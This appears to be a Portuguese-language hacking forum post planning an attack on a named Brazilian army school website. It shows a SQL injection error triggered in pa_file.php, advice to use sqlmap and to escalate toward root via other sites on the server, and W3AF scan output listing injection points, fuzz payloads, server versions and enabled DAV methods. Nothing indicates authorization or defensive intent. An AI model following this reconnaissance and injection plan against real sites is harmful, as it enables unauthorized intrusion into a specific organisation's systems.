SQL Error : -1 ERRO: erro de sintaxe em ou próximo a "\" at character 480
SELECT f.*, AVG(r.rate_point) AS rating, COUNT(r.votes_file) AS total_votes, u.user_id, u.username, COUNT(c.comments_id) as total_comments, cat.cat_allow_ratings, cat.cat_allow_comments FROM bb_pa_files AS f LEFT JOIN bb_pa_votes AS r ON f.file_id = r.votes_file LEFT JOIN bb_users AS u ON f.user_id = u.user_id LEFT JOIN bb_pa_comments AS c ON f.file_id = c.file_id LEFT JOIN bb_pa_cat AS cat ON f.file_catid = cat.cat_id WHERE f.file_id = 277\' AND f.file_approved = 1 GROUP BY f.user_id, f.poster_ip, f.file_name, f.file_size, f.unique_name, f.real_name, f.file_dir, f.file_desc, f.file_creator, f.file_version, f.file_longdesc, f.file_ssurl, f.file_sshot_link, f.file_dlurl, f.file_time, f.file_update_time, f.file_id, f.file_catid, f.file_posticon, f.file_license, f.file_dls, f.file_last, f.file_pin, f.file_docsurl, f.file_approved, f.file_broken, r.votes_file, u.user_id, u.username, cat.cat_allow_ratings, cat.cat_allow_comments
Line : 74
File : pa_file.php
Isso é potgreen sql se for utiliza ferramenta automatizadora acho que o sql map faz esse tipo de injection. Acho que autendicado no forum seria mais eficaz a injeção.
Não indexação de diretorios web so seguir os link:
Tenta acha falhas em outros sites que possibilite acesso ao servidor para um futuramente conseguir um user root.
Passa um scaan voltado a plataforma web com o acunix e um para o servidor com nmap, tamben pode passa o SSS que é bom . Tem uns aqui de linux mas eu esqueci o nome mas que são muito bom depois eu posto com os links.
Vulnerabilidades que achei nesse site usando o W3AF:
[Qua 25 Mai 2011 20:50:54 BRT] An unidentified vulnerability was found at: "http://www.cmr.ensino.eb.br/index.php", using HTTP method POST. The sent post-data was: "Itemid=543&task=search&option=d'kc"z'gj'"%2A%2A5% 2A(((%3B-%2A%60)&searchword=Pesquisa+no+site....". The modified parameter was "option". This vulnerability was found in the request with id 253.
[Qua 25 Mai 2011 20:50:54 BRT] An unidentified vulnerability was found at: "http://www.cmr.ensino.eb.br/index.php", using HTTP method POST. The sent post-data was: "option=com_apoll&format=raw&task_button=Voto&vote id=1&222c5e4589e7e179c740e9d406fe8f44=&id=1&view=a poll". The modified parameter was "222c5e4589e7e179c740e9d406fe8f44". This vulnerability was found in the request with id 272.
[Qua 25 Mai 2011 20:50:54 BRT] An unidentified vulnerability was found at: "http://www.cmr.ensino.eb.br/index.php", using HTTP method POST. The sent post-data was: "option=com_apoll&format=raw&task_button=Voto&vote id=1&222c5e4589e7e179c740e9d406fe8f44=1&id=d'kc"z' gj'"%2A%2A5%2A(((%3B-%2A%60)&view=apoll". The modified parameter was "id". This vulnerability was found in the request with id 275.
e outras informações:
[Qua 25 Mai 2011 20:47:40 BRT] The server header for the remote web server is: "Apache/2.2.17 (EL)". This information was found in the request with id 16.
[Qua 25 Mai 2011 20:47:40 BRT] "x-powered-by" header for this HTTP server is: "PHP/5.2.16". This information was found in the request with id 17.
[Qua 25 Mai 2011 20:49:24 BRT] The URL: "http://www.cmr.ensino.eb.br/" has the following DAV methods enabled:
[Qua 25 Mai 2011 20:49:24 BRT] - *, ACL, BASELINE_CONTROL, CHECKIN, CHECKOUT, CONNECT, COPY, DEBUG, GET, HEAD, INDEX, INVALID, INVOKE, LABEL, LINK, LOCK, MERGE, MKACTIVITY, MKCOL, MKDIR, MKWORKSPACE, MOVE, NOTIFY, OPTIONS, PATCH, PIN, POLL, POST, PROPFIND, PROPPATCH, REPLY, REPORT, RMDIR, SEARCH, SHOWMETHOD, SPACEJUMP, SUBSCRIBE, SUBSCRIPTIONS, TEXTSEARCH, TRACE, TRACK, UNCHECKOUT, UNLINK, UNLOCK, UNSUBSCRIBE, VERSION_CONTROL
[Qua 25 Mai 2011 20:49:24 BRT] Found 2 URLs and 6 different points of injection.
[Qua 25 Mai 2011 20:49:24 BRT] The list of URLs is:
[Qua 25 Mai 2011 20:49:24 BRT] - Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
[Qua 25 Mai 2011 20:49:24 BRT] - Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
[Qua 25 Mai 2011 20:49:24 BRT] The list of fuzzable requests is:
[Qua 25 Mai 2011 20:49:24 BRT] - Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... | Method: GET
[Qua 25 Mai 2011 20:49:24 BRT] - Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... | Method: POST | Parameters: (Itemid="543", task="search", option="com_search", searchword="Pesquisa n...")
[Qua 25 Mai 2011 20:49:24 BRT] - Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... | Method: POST | Parameters: (option="com_apoll", format="raw", voteid="1", 222c5e4589e7e179c740e9d406fe8f44="1", id="1", view="apoll")
[Qua 25 Mai 2011 20:49:24 BRT] - Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... | Method: POST | Parameters: (option="com_apoll", format="raw", voteid="1", voteid="2", voteid="3", voteid="4", voteid="5", voteid="6", 222c5e4589e7e179c740e9d406fe8f44="1", id="1", view="apoll")
[Qua 25 Mai 2011 20:49:24 BRT] - Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... | Method: POST | Parameters: (option="com_apoll", format="raw", voteid="4", 222c5e4589e7e179c740e9d406fe8f44="1", id="1", view="apoll")
[Qua 25 Mai 2011 20:49:24 BRT] - Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... | Method: POST | Parameters: (option="com_apoll", format="raw", voteid="6", 222c5e4589e7e179c740e9d406fe8f44="1", id="1", view="apoll")
[Qua 25 Mai 2011 20:49:33 BRT] The web application sent a persistent cookie.
Comment